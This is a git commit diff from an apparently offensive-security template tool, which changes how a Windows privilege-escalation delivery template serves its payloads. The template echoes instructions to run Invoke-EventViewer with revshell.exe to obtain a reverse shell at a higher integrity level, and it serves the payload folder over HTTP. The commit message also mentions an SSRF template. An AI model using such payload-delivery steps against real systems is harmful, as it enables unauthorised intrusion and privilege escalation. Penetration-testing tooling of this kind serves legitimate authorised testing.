Feat/enhanced http server (#31)
* feat: added enhanced python http server helper_script

also addded ssrf template making use of the --show-headers flag

* fix: Addition of packstation creation

* fix: Adjusted enhanced server for new template structure

* fix: applied suggestion to fix python call

---------

Co-authored-by: PluggeRo <robin@plugge-mail.de>

--- a/src/profi/templates/scripts/deliver-windows-Invoke-EventViewer.ps1.yaml
+++ b/src/profi/templates/scripts/deliver-windows-Invoke-EventViewer.ps1.yaml
@@ -14,4 +14,4 @@ content: |
   echo 'Execute (It takes a few seconds to trigger the revshell): Invoke-EventViewer <%=$(esh variables/delivery_path_windows)%>\revshell.exe'; \
   echo 'NOTE: You should get a new revshell with a higher integrity level (but still the same user)'; \
   echo '================================================================'; \
-  python -m http.server <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
+   python <%=$(esh variables/templates_dir)%>/helper_scripts/startEnhancedHttpServer.py -p <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
